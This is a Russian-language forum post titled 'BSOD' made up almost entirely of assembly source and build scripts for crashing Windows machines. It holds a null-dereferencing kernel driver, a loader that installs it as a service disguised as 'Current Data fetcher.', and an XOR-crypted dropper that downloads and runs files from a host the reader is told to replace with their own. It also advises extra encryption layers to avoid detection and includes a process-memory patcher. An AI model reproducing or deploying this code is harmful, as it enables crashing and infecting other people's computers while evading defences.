BSOD
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
BSOD - 2012-02-11 02:10:58.093333
|
|
|
Elisaveta
Сообщений: 58
Оценки: 0
Присоединился: 2009-11-16 01:45:21.883333
|
1.При помощи драйвера:
; ===================================== ;
; ------------- BSOD.sys ---------------;
;(нужна установка WINDDK\например 3790)
.686
.model flat, stdcall
extern DbgPrint:PROC
.code
DriverEntry proc
push offset as
CALL DbgPrint
pop eax
XOR EAX, EAX
MOV EAX, [EAX]
push offset am
CALL DbgPrint
pop eax
mov eax, 0C0000182h
RETN 8
DriverEntry endp
.data
as DB "COOL", 0Dh, 0Ah, 0
am DB "AMNESIA", 0Dh, 0Ah, 0
end DriverEntry
; ------------------ assemble.bat ---------------;
@ECHO OFF
SET FILE_NAME=BSOD
REM каждый настраивает эту строку под себя!
SET ntoskrnl=C:\WINDDK\3790.1830\lib\wxp\i386\ntoskrnl.lib
IF EXIST %FILE_NAME%.obj DEL %FILE_NAME%.obj
ml /nologo /c /coff %FILE_NAME%.asm
IF NOT EXIST %FILE_NAME%.obj GOTO err
link /nologo /driver /base:0x10000 /align:32 /out:%FILE_NAME%.sys /subsystem:native %FILE_NAME%.obj %ntoskrnl%
GOTO end
:err
ECHO -ERR!
:end
;==============================================================; ; А Сие не требует установки DriverDevelopmentKit ;
; исходники,ntoskrnl.lib берём с WASM.ru (классный сайт)
; остальное ntdef.inc,ntstatus.inc,ntddk.inc,ntoskrnl.inc там-же
; (или юзаем protoize(работает на ура))
.386
.model flat, stdcall
option casemap:none
include ntstatus.inc
include ntddk.inc
include ntoskrnl.inc
includelib ntoskrnl.lib
include Strings.mac
IOPM_SIZE equ 2000h
.data
my db "R","I","N","G",0
.code
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING ; или DWORD
mov eax,offset my
call eax ; Здесь вам не тут.Это не Ring3.Ну мы же хотим обвалить систему?
ret
; или просто вешаем систему отключив защиту ядра:
; MOV EAX,CR0
; AND EAX,0FFFEFFFFh
; MOV CR0,EAX
DriverEntry endp
end DriverEntry
; ---------- Make.bat -----------------;
@echo off
goto make
:make
\masm32\bin\ml /nologo /c /coff BSOD.asm
\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:BSOD.sys /subsystem:native BSOD.obj
del BSOD.obj
echo.
pause ;=====================================;
;---------- DriverLoader.asm ---------;
.386
.model flat, stdcall
option casemap:none
include c:\masm32\include\windows.inc
include c:\masm32\include\kernel32.inc
include c:\masm32\include\user32.inc
include c:\masm32\include\advapi32.inc
includelib c:\masm32\lib\kernel32.lib
includelib c:\masm32\lib\user32.lib
includelib c:\masm32\lib\advapi32.lib
include Strings.mac
.code
start proc
LOCAL fOK:BOOL
LOCAL hSCManager:HANDLE
LOCAL hService:HANDLE
LOCAL acDriverPath[MAX_PATH]:CHAR
LOCAL hKey:HANDLE
LOCAL dwProcessId:DWORD
and fOK, 0
invoke OpenSCManager, NULL, NULL, SC_MANAGER_CREATE_SERVICE
.if eax != NULL
mov hSCManager, eax
push eax
invoke GetFullPathName, $CTA0("BSOD.sys"), sizeof acDriverPath, addr acDriverPath, esp
pop eax
invoke CreateService, hSCManager, $CTA0("BSOD"), $CTA0("Current Data fetcher."), \
SERVICE_START + DELETE, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, \
SERVICE_ERROR_IGNORE, addr acDriverPath, NULL, NULL, NULL, NULL, NULL
.if eax != NULL
mov hService, eax
invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE, \
$CTA0("SYSTEM\\CurrentControlSet\\Services\\BSOD"), \
0, KEY_CREATE_SUB_KEY + KEY_SET_VALUE, addr hKey
.if eax == ERROR_SUCCESS
invoke GetCurrentProcessId
mov dwProcessId, eax
invoke RegSetValueEx, hKey, $CTA0("ProcessId", szProcessId), NULL, REG_DWORD, \
addr dwProcessId, sizeof DWORD
.if eax == ERROR_SUCCESS
invoke StartService, hService, 0, NULL
inc fOK
invoke RegDeleteValue, hKey, addr szProcessId
.else
invoke MessageBox, NULL, $CTA0("Can't add Process ID into registry."), \
NULL, MB_ICONSTOP
.endif
invoke RegCloseKey, hKey
.else
invoke MessageBox, NULL, $CTA0("Can't open registry."), NULL, MB_ICONSTOP
.endif
invoke DeleteService, hService
invoke CloseServiceHandle, hService
.else
invoke MessageBox, NULL, $CTA0("Can't register driver."), NULL, MB_ICONSTOP
.endif
invoke CloseServiceHandle, hSCManager
.else
invoke MessageBox, NULL, $CTA0("Can't connect to Service Control Manager."), \
NULL, MB_ICONSTOP
.endif
.if fOK
.endif
invoke ExitProcess, 0
start endp
end start
; --------------- DriverLoader.bat ----------------;
@echo off
\masm32\bin\ml /c /coff DriverLoader.asm
if errorlevel 1 goto exit
\masm32\bin\link /subsystem:windows DriverLoader.obj
if exist DriverLoader.obj del DriverLoader.obj
goto exit
;==================================================; ; Ну а дальше что?Может быть так?
; -------------- URLDownloadToFile.asm ------------;
.386
.mmx
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
.code
start:
; простой побайтовый XOR-криптор
MOV ESI, amnesia_begin ; криптуем от сих...
MOV EDI, ESI
MOV ECX, amnesia_end - amnesia_begin ; ...и до сколько надо...
my_begin:
LODSB
XOR AL, 77h ; или add al,XXh ,а в расшифровщике sub al,XXh
STOSB
LOOP my_begin
amnesia_begin:
xor eax, eax
mov ecx, offset DQWORD_VAL
db 00fh, 10h, 01h
db 00fh, 50h, 0c0h
test eax, eax
jz Exit
push offset urlmonStr
call LoadLibraryA
push offset downloadfunc
push eax
call GetProcAddress
push 0
push 0
push offset PathToSavedr
push offset TargetURLdr
push 0
call eax
push offset shell32Str
call LoadLibraryA
push offset executefunc
push eax
call GetProcAddress
push 0
push 0
push 0
push offset PathToSavedr
push offset OpenString
push 0
call eax
push offset urlmonStr
call LoadLibraryA
push offset downloadfunc
push eax
call GetProcAddress
push 0
push 0
push offset PathToSave
push offset TargetURL
push 0
call eax
push offset shell32Str
call LoadLibraryA
push offset executefunc
push eax
call GetProcAddress
push 0
push 0
push 0
push offset PathToSave
push offset OpenString
push 0
call eax
Exit:
push 0
call ExitProcess
OpenString db "open",0
urlmonStr db "urlmon.dll",0
shell32Str db "shell32.dll",0
downloadfunc db "URLDownloadToFileA",0
executefunc db "ShellExecuteA",0
TargetURL db "http://127.0.0.1/test.sys",0 ;Вместо 127.0.0.1 -> ваш адрес
PathToSave db "C:\Documents and Settings\Пользователь\Рабочий стол\BSOD.sys",0
TargetURLdr db "http://127.0.0.1/test.exe",0
PathToSavedr db "C:\Documents and Settings\Пользователь\Рабочий стол\DriverLoader.exe",0
DQWORD_VAL db 0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh
amnesia_end:
end start ; -------------------- Build.bat -------------------;
@echo off
\masm32\bin\ml /c /coff URLDownloadToFile.asm
\masm32\bin\link /subsystem:windows /section:.text,RWE URLDownloadToFile.obj
if exist *.obj del *.obj
; после компиляции(будет звенеть!)открываем в отладчике,запускаем на исполнение,код зашифруется,
;Save to Executable mod -> радуемся
;(если что-то радоваться не даёт -> можно добавить многослойное шифрование или вообще зачистить поляну ;——————————————————–;
; Из user mode в BSOD без написания драйвера:
; ——————————————————-;
; ------------Txt-Exe-Txt-Loader.asm----------------;
.486
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\masm32.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
includelib \masm32\lib\masm32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
; include - необходимый минимум
.data
My db "Hallo.txt",0
App db "Kernel Editor",0 ; Моя работа... :)
Err1 db "Program not found :(",0 ;
prog db "Hallo.exe",0 ; Имя проги
bufwr DWORD 90h ; nop
va DWORD 579C03h ; Это первый адрес, по которому надо произвести запись
va2 DWORD 579C04h ; А это второй
; Кормовые,носовые товсь,пли!!!
.data?
bufr dw ? ; Байт, в который производится чтение
pinfo PROCESS_INFORMATION <> ; Инфа о процессе
sinfo STARTUPINFO <> ; инфа о запуске
n DWORD ? ; Кол-во байтов
.code
start: ; ОффициЯльное начало
invoke CopyFile,ADDR My,ADDR prog,0
invoke CreateProcess,addr prog,NULL,NULL,NULL,FALSE,CREATE_NEW_CONSOLE OR NORMAL_PRIORITY_CLASS,NULL,NULL,addr sinfo,addr pinfo
; Создаем процесс.. CREATE_NEW_CONSOLE OR NORMAL_PRIORITY_CLASS для того, чтобы запускаемая прога не сворачивалась.
.IF eax == 0 ; Если EAX(результат) равен 0(прога не запустилась)
invoke MessageBox,NULL,addr Err1,addr App,MB_OK ; Выдаем сообщение
invoke ExitProcess,0 ; И выходим :)
.ENDIF ; В нашем деле главное что?Правильно.Вовремя смыться.
.WHILE TRUE ; Цикл.макросы.Хорошо.
invoke ReadProcessMemory,pinfo.hProcess,va,addr bufr,1,n ; Читаем память
.IF eax != 0 ; Если все ОК
invoke WriteProcessMemory,pinfo.hProcess,va,addr bufwr,1,n ; Пишем куда надо NOP
invoke WriteProcessMemory,pinfo.hProcess,va2,addr bufwr,1,n ; И сюда тоже NOP
invoke ResumeThread,addr pinfo.hThread ; Отправляем прогу дальше лесом пока не заблудится
invoke CloseHandle,pinfo.hThread ; Сворачиваем мокруху
invoke ExitThread,0
invoke ExitProcess,0 ; Уходим
.ENDIF
invoke DeleteFile,ADDR prog
.ENDW
end start ; ОффициаЯльный конец
; ----------------- Hallo.asm -----------;
format PE GUI 4.0
entry start
include 'win32a.inc'
include 'ddraw.inc'
section '.text' code readable executable
start:
invoke GetModuleHandleA,NULL
mov [hinstance],eax
invoke LoadIconA,NULL,IDI_APPLICATION
mov [wc.hIcon],eax
invoke LoadCursorA,NULL,IDC_ARROW
mov [wc.hCursor],eax
mov [wc.style],0
mov [wc.lpfnWndProc],WindowProc
mov [wc.cbClsExtra],0
mov [wc.cbWndExtra],0
mov eax,[hinstance]
mov [wc.hInstance],eax
mov [wc.hbrBackground],0
mov dword [wc.lpszMenuName],NULL
mov dword [wc.lpszClassName],_class
invoke RegisterClassA,wc
test eax,eax
jz startup_error
invoke CreateWindowExA,\
0,_class,_title,WS_POPUP+WS_VISIBLE,0,0,0,0,NULL,NULL,[hinstance],NULL
test eax,eax
jz startup_error
mov [hwnd],eax
invoke DirectDrawCreate,NULL,DDraw,NULL
or eax,eax
jnz ddraw_error
cominvk DDraw,SetCooperativeLevel,\
[hwnd],DDSCL_EXCLUSIVE+DDSCL_FULLSCREEN
or eax,eax
jnz ddraw_error
cominvk DDraw,SetDisplayMode,\
640,480,8
or eax,eax
jnz ddraw_error
mov [ddsd.dwSize],sizeof.DDSURFACEDESC
mov [ddsd.dwFlags],DDSD_CAPS+DDSD_BACKBUFFERCOUNT
mov [ddsd.ddsCaps.dwCaps],DDSCAPS_PRIMARYSURFACE+DDSCAPS_FLIP+DDSCAPS_COMPLEX
mov [ddsd.dwBackBufferCount],1
cominvk DDraw,CreateSurface,\
ddsd,DDSPrimary,NULL
or eax,eax
jnz ddraw_error
mov [ddscaps.dwCaps],DDSCAPS_BACKBUFFER
cominvk DDSPrimary,GetAttachedSurface,\
ddscaps,DDSBack
or eax,eax
jnz ddraw_error
mov esi,picture
call load_picture
jc open_error
mov esi,picture
call load_palette
jc open_error
invoke GetTickCount
mov [last_tick],eax
jmp paint
main_loop:
invoke PeekMessageA,msg,NULL,0,0,PM_NOREMOVE
or eax,eax
jz no_message
invoke GetMessageA,msg,NULL,0,0
or eax,eax
jz end_loop
invoke TranslateMessage,msg
invoke DispatchMessageA,msg
jmp main_loop
no_message:
cmp [active],0
je sleep
cominvk DDSPrimary,IsLost
or eax,eax
jz paint
cmp eax,DDERR_SURFACELOST
jne end_loop
cominvk DDSPrimary,Restore
paint:
mov [rect.top],0
mov [rect.bottom],480
mov [rect.left],0
mov [rect.right],640
cominvk DDSBack,BltFast,\
0,0,[DDSPicture],rect,DDBLTFAST_SRCCOLORKEY
or eax,eax
jnz paint_done
movzx eax,[frame]
xor edx,edx
mov ebx,10
div ebx
sal eax,6
add eax,480
mov [rect.top],eax
add eax,64
mov [rect.bottom],eax
sal edx,6
mov [rect.left],edx
add edx,64
mov [rect.right],edx
cominvk DDSBack,BltFast,\
[x],[y],[DDSPicture],rect,DDBLTFAST_SRCCOLORKEY
cominvk DDSPrimary,SetPalette,[DDPalette]
cominvk DDSPrimary,Flip,0,0
paint_done:
invoke GetTickCount
mov ebx,eax
sub ebx,[last_tick]
cmp ebx,20
jb main_loop
add [last_tick],20
inc [frame]
cmp [frame],60
jb main_loop
mov [frame],0
jmp main_loop
sleep:
invoke WaitMessage
jmp main_loop
ddraw_error:
mov eax,_ddraw_error
jmp error
open_error:
mov eax,_open_error
error:
invoke MessageBoxA,[hwnd],eax,_error,MB_OK+MB_ICONERROR
invoke DestroyWindow,[hwnd]
invoke PostQuitMessage,1
jmp main_loop
startup_error:
invoke MessageBoxA,[hwnd],_startup_error,_error,MB_OK+MB_ICONERROR
end_loop:
invoke ExitProcess,[msg.wParam]
include 'gif87a.inc'
proc WindowProc hwnd,wmsg,wparam,lparam
push ebx esi edi
mov eax,[wmsg]
cmp eax,WM_CREATE
je .wmcreate
cmp eax,WM_DESTROY
je .wmdestroy
cmp eax,WM_ACTIVATE
je .wmactivate
cmp eax,WM_SETCURSOR
je .wmsetcursor
cmp eax,WM_MOUSEMOVE
je .wmmousemove
cmp eax,WM_KEYDOWN
je .wmkeydown
.defwindowproc:
invoke DefWindowProcA,[hwnd],[wmsg],[wparam],[lparam]
jmp .finish
.wmcreate:
xor eax,eax
jmp .finish
.wmkeydown:
cmp [wparam],VK_ESCAPE
jne .finish
.wmdestroy:
cominvk DDraw,RestoreDisplayMode
cominvk DDraw,Release
invoke PostQuitMessage,0
xor eax,eax
jmp .finish
.wmactivate:
mov eax,[wparam]
mov [active],al
jmp .finish
.wmsetcursor:
invoke SetCursor,0
xor eax,eax
jmp .finish
.wmmousemove:
movsx eax,word [lparam]
mov [x],eax
movsx eax,word [lparam+2]
mov [y],eax
.finish:
pop edi esi ebx
ret
endp
section '.data' data readable writeable
_title db 'flat assembler DirectDraw application',0
_class db 'FDDRAW32',0
_error db 'Error',0
_startup_error db 'Startup failed.',0
_ddraw_error db 'Direct Draw initialization failed.',0
_open_error db 'А вот ??? вам,а не скамейки !!!',0
picture db 'DDRAW.GIF',0
section '.bss' readable writeable
hinstance dd ?
hwnd dd ?
wc WNDCLASS
msg MSG
ddsd DDSURFACEDESC
ddscaps DDSCAPS
DDraw DirectDraw
DDSPrimary DirectDrawSurface
DDSBack DirectDrawSurface
DDSPicture DirectDrawSurface
DDPalette DirectDrawPalette
bytes_count dd ?
last_tick dd ?
frame db ?
active db ?
LZW_bits db ?
LZW_table rd (0F00h-2)*2
buffer rb 40000h
rect RECT
x dd ?
y dd ?
section '.idata' import data readable
library kernel,'KERNEL32.DLL',\
user,'USER32.DLL',\
ddraw,'DDRAW.DLL'
import kernel,\
GetModuleHandleA,'GetModuleHandleA',\
CreateFileA,'CreateFileA',\
ReadFile,'ReadFile',\
CloseHandle,'CloseHandle',\
GetTickCount,'GetTickCount',\
ExitProcess,'ExitProcess'
import user,\
RegisterClassA,'RegisterClassA',\
CreateWindowExA,'CreateWindowExA',\
DestroyWindow,'DestroyWindow',\
DefWindowProcA,'DefWindowProcA',\
GetMessageA,'GetMessageA',\
PeekMessageA,'PeekMessageA',\
TranslateMessage,'TranslateMessage',\
DispatchMessageA,'DispatchMessageA',\
LoadCursorA,'LoadCursorA',\
LoadIconA,'LoadIconA',\
SetCursor,'SetCursor',\
MessageBoxA,'MessageBoxA',\
PostQuitMessage,'PostQuitMessage',\
WaitMessage,'WaitMessage'
import ddraw,\
DirectDrawCreate,'DirectDrawCreate'
; compile FASM 1.68 -> Run Txt-Exe-Txt-Loader.exe -> O.K. ->
; 2Run Txt-Exe-Txt-Loader.exe ->> BSOD ; ----------------DDRAW.GIF-----------------------;
GIF ; ----------------GIF87A.INC-----------------------;
virtual at buffer
GIFHEADER:
.ID dd ?
.ver dw ?
.width dw ?
.height dw ?
.bits db ?
.background db ?
.reserved db ?
.length = $ - GIFHEADER
end virtual
load_picture:
invoke CreateFileA,esi,GENERIC_READ,0,0,OPEN_EXISTING,0,0
mov edi,eax
invoke ReadFile,edi,GIFHEADER,40000h,bytes_count,0
invoke CloseHandle,edi
cmp [GIFHEADER.ID],'GIF8'
jne picture_error
cmp [GIFHEADER.ver],'7a'
jne picture_error
mov al,[GIFHEADER.bits]
and al,111b
cmp al,111b
jne picture_error
add [bytes_count],buffer
mov esi,buffer+GIFHEADER.length+256*3
mov edi,esi
find_image:
cmp esi,[bytes_count]
jae picture_error
lodsb
cmp al,','
jne find_image
add esi,4
xor eax,eax
lodsw
mov ebx,eax
lodsw
add esi,2
mov [ddsd.dwSize],sizeof.DDSURFACEDESC
mov [ddsd.dwFlags],DDSD_CAPS+DDSD_WIDTH+DDSD_HEIGHT+DDSD_CKSRCBLT
mov [ddsd.ddsCaps.dwCaps],DDSCAPS_OFFSCREENPLAIN+DDSCAPS_SYSTEMMEMORY
mov [ddsd.dwWidth],ebx
mov [ddsd.dwHeight],eax
movzx eax,[GIFHEADER.background]
mov [ddsd.ddckCKSrcBlt.dwColorSpaceLowValue],eax
mov [ddsd.ddckCKSrcBlt.dwColorSpaceHighValue],eax
cominvk DDraw,CreateSurface,\
ddsd,DDSPicture,0
or eax,eax
jnz picture_error
cominvk DDSPicture,Lock,\
0,ddsd,DDLOCK_WAIT,0
mov edi,esi
mov edx,esi
mov ebx,buffer
add ebx,[bytes_count]
link_streams:
cmp esi,[bytes_count]
jae picture_error
lodsb
movzx ecx,al
rep movsb
or al,al
jnz link_streams
mov edi,[ddsd.lpSurface]
mov ebx,edx
mov [LZW_bits],0
LZW_clear:
xor edx,edx
LZW_decompress_loop:
mov ch,9
cmp edx,(100h-2)*8
jbe LZW_read_bits
mov ch,10
cmp edx,(300h-2)*8
jbe LZW_read_bits
mov ch,11
cmp edx,(700h-2)*8
jbe LZW_read_bits
mov ch,12
LZW_read_bits:
mov cl,[LZW_bits]
mov eax,[ebx]
shr eax,cl
xchg cl,ch
mov esi,1
shl esi,cl
dec esi
and eax,esi
add cl,ch
LZW_read_bits_count:
cmp cl,8
jbe LZW_read_bits_ok
sub cl,8
inc ebx
jmp LZW_read_bits_count
LZW_read_bits_ok:
mov [LZW_bits],cl
cmp eax,100h
jb LZW_single_byte
je LZW_clear
sub eax,102h
jc LZW_end
shl eax,3
cmp eax,edx
ja picture_error
mov ecx,[LZW_table+eax]
mov esi,[LZW_table+eax+4]
mov [LZW_table+edx+4],edi
rep movsb
mov eax,[LZW_table+eax]
inc eax
mov [LZW_table+edx],eax
jmp LZW_decompress_next
LZW_single_byte:
mov [LZW_table+edx],2
mov [LZW_table+edx+4],edi
stosb
LZW_decompress_next:
add edx,8
jmp LZW_decompress_loop
LZW_end:
cominvk DDSPicture,Unlock,0
mov eax,[DDSPicture]
clc
ret
picture_error:
stc
ret
load_palette:
invoke CreateFileA,esi,GENERIC_READ,0,0,OPEN_EXISTING,0,0
mov edi,eax
invoke ReadFile,edi,buffer,GIFHEADER.length+256*3,bytes_count,0
cmp [bytes_count],GIFHEADER.length+256*3
jne picture_error
invoke CloseHandle,edi
cmp [GIFHEADER.ID],'GIF8'
jne picture_error
cmp [GIFHEADER.ver],'7a'
jne picture_error
mov al,[GIFHEADER.bits]
and al,111b
cmp al,111b
jne picture_error
mov esi,buffer+GIFHEADER.length
mov edi,buffer+400h
mov ecx,256
convert_palette:
movsw
movsb
xor al,al
stosb
loop convert_palette
cominvk DDraw,CreatePalette,\
DDPCAPS_8BIT+DDPCAPS_ALLOW256,buffer+400h,DDPalette,0
or eax,eax
jnz picture_error
clc
ret
; ---------------------------- DDRAW.INC ---------------------------;
interface DirectDraw,\
QueryInterface,\
AddRef,\
Release,\
Compact,\
CreateClipper,\
CreatePalette,\
CreateSurface,\
DuplicateSurface,\
EnumDisplayModes,\
EnumSurfaces,\
FlipToGDISurface,\
GetCaps,\
GetDisplayMode,\
GetFourCCCodes,\
GetGDISurface,\
GetMonitorFrequency,\
GetScanLine,\
GetVerticalBlankStatus,\
Initialize,\
RestoreDisplayMode,\
SetCooperativeLevel,\
SetDisplayMode,\
WaitForVerticalBlank,\
GetAvailableVidMem,\
GetSurfaceFromDC,\
RestoreAllSurfaces,\
TestCooperativeLevel,\
GetDeviceIdentifier,\
StartModeTest,\
EvaluateMode
interface DirectDrawSurface,\
QueryInterface,\
AddRef,\
Release,\
AddAttachedSurface,\
AddOverlayDirtyRect,\
Blt,\
BltBatch,\
BltFast,\
DeleteAttachedSurface,\
EnumAttachedSurfaces,\
EnumOverlayZOrders,\
Flip,\
GetAttachedSurface,\
GetBltStatus,\
GetCaps,\
GetClipper,\
GetColorKey,\
GetDC,\
GetFlipStatus,\
GetOverlayPosition,\
GetPalette,\
GetPixelFormat,\
GetSurfaceDesc,\
Initialize,\
IsLost,\
Lock,\
ReleaseDC,\
Restore,\
SetClipper,\
SetColorKey,\
SetOverlayPosition,\
SetPalette,\
Unlock,\
UpdateOverlay,\
UpdateOverlayDisplay,\
UpdateOverlayZOrder,\
GetDDInterface,\
PageLock,\
PageUnlock,\
SetSurfaceDesc,\
SetPrivateData,\
GetPrivateData,\
FreePrivateData,\
GetUniquenessValue,\
ChangeUniquenessValue,\
SetPriority,\
GetPriority,\
SetLOD,\
GetLOD
interface DirectDrawPalette,\
QueryInterface,\
AddRef,\
Release,\
GetCaps,\
GetEntries,\
Initialize,\
SetEntries
interface DirectDrawClipper,\
QueryInterface,\
AddRef,\
Release,\
GetClipList,\
GetHWnd,\
Initialize,\
IsClipListChanged,\
SetClipList,\
SetHWnd
interface DirectDrawColorControl,\
QueryInterface,\
AddRef,\
Release,\
GetColorControls,\
SetColorControls
interface DirectDrawGammaControl,\
QueryInterface,\
AddRef,\
Release,\
GetGammaRamp,\
SetGammaRamp
struct DDCOLORKEY
dwColorSpaceLowValue dd ?
dwColorSpaceHighValue dd ?
ends
struct DDPIXELFORMAT
dwSize dd ?
dwFlags dd ?
dwFourCC dd ?
union
dwRGBBitCount dd ?
dwYUVBitCount dd ?
dwZBufferBitDepth dd ?
dwAlphaBitDepth dd ?
dwLuminanceBitCount dd ?
dwBumpBitCount dd ?
ends
union
dwRBitMask dd ?
dwYBitMask dd ?
dwStencilBitDepth dd ?
dwLuminanceBitMask dd ?
dwBumpDuBitMask dd ?
ends
union
dwGBitMask dd ?
dwUBitMask dd ?
dwZBitMask dd ?
dwBumpDvBitMask dd ?
ends
union
dwBBitMask dd ?
dwVBitMask dd ?
dwStencilBitMask dd ?
dwBumpLuminanceBitMask dd ?
ends
union
dwRGBAlphaBitMask dd ?
dwYUVAlphaBitMask dd ?
dwLuminanceAlphaBitMask dd ?
dwRGBZBitMask dd ?
dwYUVZBitMask dd ?
ends
ends
struct DDSCAPS
dwCaps dd ?
ends
struct DDSURFACEDESC
dwSize dd ?
dwFlags dd ?
dwHeight dd ?
dwWidth dd ?
union
lPitch dd ?
dwLinearSize dd ?
ends
dwBackBufferCount dd ?
union
dwMipMapCount dd ?
dwZBufferBitDepth dd ?
dwRefreshRate dd ?
ends
dwAlphaBitDepth dd ?
dwReserved dd ?
lpSurface dd ?
ddckCKDestOverlay DDCOLORKEY
ddckCKDestBlt DDCOLORKEY
ddckCKSrcOverlay DDCOLORKEY
ddckCKSrcBlt DDCOLORKEY
ddpfPixelFormat DDPIXELFORMAT
ddsCaps DDSCAPS
ends
; А вот флаг вам(и на бронепоезд)
DDSCL_FULLSCREEN = 000000001h
DDSCL_ALLOWREBOOT = 000000002h
DDSCL_NOWINDOWCHANGES = 000000004h
DDSCL_NORMAL = 000000008h
DDSCL_EXCLUSIVE = 000000010h
DDSCL_ALLOWMODEX = 000000040h
DDBLT_ALPHADEST = 000000001h
DDBLT_ALPHADESTCONSTOVERRIDE = 000000002h
DDBLT_ALPHADESTNEG = 000000004h
DDBLT_ALPHADESTSURFACEOVERRIDE = 000000008h
DDBLT_ALPHAEDGEBLEND = 000000010h
DDBLT_ALPHASRC = 000000020h
DDBLT_ALPHASRCCONSTOVERRIDE = 000000040h
DDBLT_ALPHASRCNEG = 000000080h
DDBLT_ALPHASRCSURFACEOVERRIDE = 000000100h
DDBLT_ASYNC = 000000200h
DDBLT_COLORFILL = 000000400h
DDBLT_DDFX = 000000800h
DDBLT_DDROPS = 000001000h
DDBLT_KEYDEST = 000002000h
DDBLT_KEYDESTOVERRIDE = 000004000h
DDBLT_KEYSRC = 000008000h
DDBLT_KEYSRCOVERRIDE = 000010000h
DDBLT_ROP = 000020000h
DDBLT_ROTATIONANGLE = 000040000h
DDBLT_ZBUFFER = 000080000h
DDBLT_ZBUFFERDESTCONSTOVERRIDE = 000100000h
DDBLT_ZBUFFERDESTOVERRIDE = 000200000h
DDBLT_ZBUFFERSRCCONSTOVERRIDE = 000400000h
DDBLT_ZBUFFERSRCOVERRIDE = 000800000h
DDBLT_WAIT = 001000000h
DDBLT_DEPTHFILL = 002000000h
DDBLTFAST_NOCOLORKEY = 000000000h
DDBLTFAST_SRCCOLORKEY = 000000001h
DDBLTFAST_DESTCOLORKEY = 000000002h
DDBLTFAST_WAIT = 000000010h
DDFLIP_WAIT = 000000001h
DDFLIP_EVEN = 000000002h
DDFLIP_ODD = 000000004h
DDSD_CAPS = 000000001h
DDSD_HEIGHT = 000000002h
DDSD_WIDTH = 000000004h
DDSD_PITCH = 000000008h
DDSD_BACKBUFFERCOUNT = 000000020h
DDSD_ZBUFFERBITDEPTH = 000000040h
DDSD_ALPHABITDEPTH = 000000080h
DDSD_LPSURFACE = 000000800h
DDSD_PIXELFORMAT = 000001000h
DDSD_CKDESTOVERLAY = 000002000h
DDSD_CKDESTBLT = 000004000h
DDSD_CKSRCOVERLAY = 000008000h
DDSD_CKSRCBLT = 000010000h
DDSD_MIPMAPCOUNT = 000020000h
DDSD_REFRESHRATE = 000040000h
DDSD_LINEARSIZE = 000080000h
DDSD_ALL = 0000FF9EEh
DDSCAPS_RESERVED1 = 000000001h
DDSCAPS_ALPHA = 000000002h
DDSCAPS_BACKBUFFER = 000000004h
DDSCAPS_COMPLEX = 000000008h
DDSCAPS_FLIP = 000000010h
DDSCAPS_FRONTBUFFER = 000000020h
DDSCAPS_OFFSCREENPLAIN = 000000040h
DDSCAPS_OVERLAY = 000000080h
DDSCAPS_PALETTE = 000000100h
DDSCAPS_PRIMARYSURFACE = 000000200h
DDSCAPS_PRIMARYSURFACELEFT = 000000400h
DDSCAPS_SYSTEMMEMORY = 000000800h
DDSCAPS_TEXTURE = 000001000h
DDSCAPS_3DDEVICE = 000002000h
DDSCAPS_VIDEOMEMORY = 000004000h
DDSCAPS_VISIBLE = 000008000h
DDSCAPS_WRITEONLY = 000010000h
DDSCAPS_ZBUFFER = 000020000h
DDSCAPS_OWNDC = 000040000h
DDSCAPS_LIVEVIDEO = 000080000h
DDSCAPS_HWCODEC = 000100000h
DDSCAPS_MODEX = 000200000h
DDSCAPS_MIPMAP = 000400000h
DDSCAPS_RESERVED2 = 000800000h
DDSCAPS_ALLOCONLOAD = 004000000h
DDSCAPS_VIDEOPORT = 008000000h
DDSCAPS_LOCALVIDMEM = 010000000h
DDSCAPS_NONLOCALVIDMEM = 020000000h
DDSCAPS_STANDARDVGAMODE = 040000000h
DDSCAPS_OPTIMIZED = 080000000h
DDLOCK_SURFACEMEMORYPTR = 000000000h
DDLOCK_WAIT = 000000001h
DDLOCK_EVENT = 000000002h
DDLOCK_READONLY = 000000010h
DDLOCK_WRITEONLY = 000000020h
DDLOCK_NOSYSLOCK = 000000800h
DDPCAPS_4BIT = 000000001h
DDPCAPS_8BITENTRIES = 000000002h
DDPCAPS_8BIT = 000000004h
DDPCAPS_INITIALIZE = 000000008h
DDPCAPS_PRIMARYSURFACE = 000000010h
DDPCAPS_PRIMARYSURFACELEFT = 000000020h
DDPCAPS_ALLOW256 = 000000040h
DDPCAPS_VSYNC = 000000080h
DDPCAPS_1BIT = 000000100h
DDPCAPS_2BIT = 000000200h
DDERR_ALREADYINITIALIZED = 088760000h+5
DDERR_CANNOTATTACHSURFACE = 088760000h+10
DDERR_CANNOTDETACHSURFACE = 088760000h+20
DDERR_CURRENTLYNOTAVAIL = 088760000h+40
DDERR_EXCEPTION = 088760000h+55
DDERR_HEIGHTALIGN = 088760000h+90
DDERR_INCOMPATIBLEPRIMARY = 088760000h+95
DDERR_INVALIDCAPS = 088760000h+100
DDERR_INVALIDCLIPLIST = 088760000h+110
DDERR_INVALIDMODE = 088760000h+120
DDERR_INVALIDOBJECT = 088760000h+130
DDERR_INVALIDPIXELFORMAT = 088760000h+145
DDERR_INVALIDRECT = 088760000h+150
DDERR_LOCKEDSURFACES = 088760000h+160
DDERR_NO3D = 088760000h+170
DDERR_NOALPHAHW = 088760000h+180
DDERR_NOCLIPLIST = 088760000h+205
DDERR_NOCOLORCONVHW = 088760000h+210
DDERR_NOCOOPERATIVELEVELSET = 088760000h+212
DDERR_NOCOLORKEY = 088760000h+215
DDERR_NOCOLORKEYHW = 088760000h+220
DDERR_NODIRECTDRAWSUPPORT = 088760000h+222
DDERR_NOEXCLUSIVEMODE = 088760000h+225
DDERR_NOFLIPHW = 088760000h+230
DDERR_NOGDI = 088760000h+240
DDERR_NOMIRRORHW = 088760000h+250
DDERR_NOTFOUND = 088760000h+255
